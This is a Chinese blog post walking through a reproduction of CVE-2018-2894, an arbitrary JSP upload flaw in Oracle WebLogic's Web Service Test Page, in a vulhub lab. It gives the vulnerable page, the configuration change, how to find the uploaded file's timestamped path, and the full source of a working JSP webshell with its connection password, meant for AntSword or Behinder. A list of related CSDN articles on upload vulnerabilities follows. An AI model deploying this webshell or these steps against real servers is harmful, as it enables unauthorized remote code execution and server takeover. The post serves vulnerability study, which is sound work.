任意文件上传漏洞(CVE-2018-2894)

已于 2022-10-22 11:57:52 修改
阅读量1.6k 收藏 2
点赞数
分类专栏: 安全渗透 漏洞复现 文章标签: php java 网络安全
于 2022-10-20 23:10:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64118193/article/details/127435433
版权

漏洞描述

Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制,漏洞存在页面在/ws_utc/config.do。

漏洞影响版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

IP地址  http://192.168.xxx.xxx:7001/console    //进入后台系统

用户账号密码获取

vulhub靶场默认账户是weblogic   密码查看一下logs就能找到了

在kali上执行  docker-compose logs | grep password

环境准备

进入高级配置

 

在此处一定要进行勾选启用web服务器测试页,勾选后下拉的最下方进行保存配置

路径: http://192.168.17.130:7001/ws_utc/config.do

当前的工作目录路径,配置完成后进行保存

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

但在此处是有坑的如果这里的配置这里最后有css,那么上传文件后,你的访问链接应该是

路径:http://localhost:7001/ws_utc/css/config/keystore/1637485345393_shell.jsp

如果没有添加/css 那么上传文件后你的链接应该是

路径:http://localhost:7001/ws_utc/config/keystore/1637485345393_shell.jsp

   安全->添加->浏览

 上传成功之后,查看返回的数据包,其中有时间戳

可以通过查看源代码的方式或者使用Burp抓包进行获取

 获取权限

获取权限的路径   http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

我们可以使用蚁剑或者冰蝎进行连接来获取权限

http://192.168.17.130:7001/ws_utc/css/config/keystore/1666276503565_shell.jsp

shell.jsp 文件 (jsp一句话木马)

【连接密码】: passwd

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

K.A.L
关注
专栏目录
tomcat漏洞任意文件上传CVE-2017-12615)
千寻的博客
09-24 3652
文章目录0x00 漏洞介绍0x01影响版本0×02原理分析0×04 环境搭建0×04 漏洞复现-(任意上传文件)方法一 在文件名后面添加斜杠 / 来进行绕过方法二: 在文件名后面添加 %20 来进行绕过方法三:在文件名后面添加 ::$DATA来进行绕过方法四:上传哥斯特生产的jsp0x05 漏洞修护 0x00 漏洞介绍 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,该漏洞受影响版本为7.0-
某office前台任意文件上传漏洞分析
HBohan的博客
12-15 1376
某office前台任意文件上传漏洞分析
10.任意文件上传漏洞(超详细!!!)
最新发布
m0_72760503的博客
08-03 931
任意文件下载漏洞:允许攻击者从服务器下载任意文件,这可能导致敏感信息泄露、服务器被控制等安全风险。这种漏洞通常由于应用程序没有对用户输入进行充分的验证和过滤而导致攻击者可以利用多种技术来执行任意文件下载,包括本地文件包含(LFI)、远程文件包含(RFI)、目录遍历和服务器端请求伪造(SSRF)等。这些技术通常通过构造特殊的URL参数或请求头来实现,例如使用…/进行目录遍历或利用文件读取函数的漏洞来读取服务器上的敏感文件。
《WEB安全漏洞30讲》(第5讲)任意文件上传漏洞
午夜安全
05-22 3422
文件上传漏洞,指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这个漏洞其实非常简单,就是攻击者给服务器上传了恶意的木马程序,然后利用此木马程序执行操作系统命令,从而获得服务器权限,造成严重的安全隐患。比如一个JAVA系统本来需要上传身份证图片进行用户实名认证,结果恶意用户上传了jsp木马文件,之后利用这个文件执行系统命令,再以这个系统为据点,对内网其他互通的系统进行攻击,这样将导致整个内网系统的沦陷。
任意文件上传漏洞
weixin_45596492的博客
03-24 7297
漏洞描述 上传文件对应用程序来说是一个很大的风险,许多攻击的第一步是把一些恶意代码上传到要攻击的系统中。然后,攻击者只需要找到一种方法来让代码被执行即可完成攻击。该漏洞通常是由于代码中对文件上传功能所上传的文件过滤不严而造成的,如果文件上传功能代码没有严格限制和验证用户上传的文件后缀、类型等,攻击者可通过文件上传点上传任意文件,包括网站后门文件(webshell)控制整个网站。 漏洞影响 任意文件上传漏洞可能造成很多严重的影响,例如主机系统失陷、文件系统或数据库过载、被作为攻击后端系统的跳板机等。
任意文件上传漏洞(简介)
diaobusi的博客
08-22 683
文件上传是指将文件从本地计算机或其他设备上传到网络服务器或其他存储位置的过程。通过文件上传,您可以将文件(如图像、文档、音频或视频等)传输到网络上的不同位置,以实现文件共享、备份、存储或与他人共享内容等目的。用户选择要上传的文件:用户在自己的设备上选择要上传的文件,可能通过文件资源管理器、拖放文件或选择文件对话框等方式进行。文件被传输至服务器:一旦用户选择文件,通过网络将文件发送到特定的服务器。可以使用各种协议,如HTTP、FTP、SFTP等来实现文件传输。
CVE-2018-2894(Weblogic 任意文件上传漏洞)
Sea_Sand息禅
07-14 894
受影响的Oracle WebLogic Server版本: 10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3 前言 该漏洞是Weblogic Web Service Test Page引起,而在“生产模式”下Weblogic Web Service Test Page默认不开启,所以该漏洞有一定限制。所以需要进行一些配置才能是漏洞可用。 一、环境搭建 1、基本搭建操作 vul...
漏洞复现】---- Weblogic 任意文件上传漏洞CVE-2018-2894
qq_43168364的博客
09-09 261
一、简介 二、漏洞环境准备 三、漏洞复现 四、可利用的版本
cve-2018-2894:cve-2018-2894 不同别人的利用方法
04-29
Weblogic任意文件上传漏洞CVE-2018-2894) 最近大家都在说这个漏洞,大家都注意到config.do这里发生了问题,但是其实根据 这里的信息,begin.do也是有问题。少扯淡,下面给出具体利用方法: 问题就出现下下面这个...
Weblogic 任意文件上传漏洞CVE-2018-2894)复现
qq_53105813的博客
01-12 1825
Weblogic 任意文件上传漏洞CVE-2018-2894)复现
WebLogic 任意文件上传CVE-2018-2894漏洞复现
橘子女侠
07-23 1413
WebLogic 任意文件上传CVE-2018-2894漏洞复现 一、漏洞概述 1、漏洞编号:CVE-2018-2894 2、漏洞描述:Weblogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在...
Weblogic 任意文件上传漏洞CVE-2018-2894
m0_53603468的博客
12-30 664
文章目录概述weblogic漏洞复现:环境搭建漏洞复现总结 概述 今天做的是Weblogic 任意文件上传漏洞CVE-2018-2894) Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。 weblogic WebLogic是美国Oracle公司出品的一个application serv.
【WEB漏洞原理】任意文件上传漏洞
过期的秋刀鱼
08-29 2563
文件上传是web应用必备功能之一,如:头像上传,附件分享登,如果服务器配置不当或者 没有进行足够的过滤,Web用户就可以上传任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上传漏洞
任意文件上传漏洞(技术栈php+TP3.2)
weixin_44783781的博客
12-18 1183
一、漏洞描述 文件上传漏洞通常由于网站对用户上传的文件未经过校验或者校验不严,导致用 户可以上传任意格式、内容的文件,并可以访问到该文件。恶意攻击者可以利用 这个漏洞,上传可以被服务端解析的木马病毒,导致服务器的权限被恶意攻击者 获取。对网站造成极大的危害。 二、问题 3、解决过程 原先的代码如下:(主要是以后缀名来断定文件类型的) public function uploadResume() { $config = array( 'maxSize
任意文件上传漏洞详解与防护
鑫和皓的博客
08-10 1887
任意文件上传漏洞是一种常见的网络安全问题,它允许攻击者上传并执行恶意文件,从而获取或破坏系统数据。上传恶意脚本:攻击者可以上传包含恶意代码的脚本文件,如PHP、ASP、JSP等,然后通过浏览器访问这些文件,执行恶意代码。上传恶意二进制文件:攻击者可以上传包含恶意代码的二进制文件,如DLL、EXE等,然后利用其他漏洞或手段执行这些文件。严格检查上传文件:对上传文件的类型、大小、名字和内容进行严格的检查,只接受符合要求的文件。使用安全编程技术:在编写文件上传功能时,使用安全编程技术,如预备语句、输入验证等。
漏洞复现】Weblogic 任意文件上传漏洞(CVE-2018-2894)
m0_69043895的博客
04-25 553
Oracle在7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page在"生产模式"下默认不开启,所以该漏洞有一定限制,利用该漏洞,可以上传任意.jsp文件,进而获取服务器权限。
wordpress任意文件上传(cve-2019-15866)
09-04
WordPress是一种广泛使用的内容管理系统(CMS),用于创建和管理网站。然而,在2019年的漏洞披露中发现了一个名为CVE-2019-15866的重要漏洞,该漏洞使得攻击者可以进行任意文件上传。 该漏洞的利用方式是通过特制的恶意请求,将恶意文件上传到WordPress网站的服务器上。攻击者可以上传包含恶意代码的文件,例如Web外壳或后门程序,以获取对网站的完全控制权。一旦攻击者获得对网站的控制,他们可以执行后续的恶意活动,例如操纵网站内容、传播恶意软件或窃取敏感信息。 为了防止CVE-2019-15866漏洞的利用,用户应该尽快升级他们的WordPress网站到最新版本。WordPress开发团队通常会在发现漏洞时发布安全更新,其中包括修复漏洞和加强系统安全性的补丁。使用最新版本的WordPress是最有效的预防措施之一。 此外,用户还可以采取其他安全措施来保护他们的WordPress网站。以下是一些建议: 1. 安装并更新信任的安全插件: 安装安全插件,如Wordfence或iThemes Security,并确保将其保持最新。这些插件可以帮助检测和预防恶意文件上传等安全问题。 2. 设定强密码和安全验证: 使用强密码,包括字母、数字和特殊字符的组合,并启用二次验证功能(如果提供)以增加访问控制。 3. 限制文件上传:限制上传文件的类型和大小,仅允许所需的文件类型,并限制文件大小以防止攻击者上传恶意文件。 4. 定期备份网站文件和数据库:定期备份网站文件和数据库,以防止数据丢失,并确保在发生安全事件时能够进行恢复。 总结而言,CVE-2019-15866漏洞是一个严重的安全威胁,可以使攻击者上传任意文件到WordPress网站。用户应及时升级他们的WordPress版本,并采取额外的安全措施以保护他们的网站免受此漏洞的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

K.A.L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值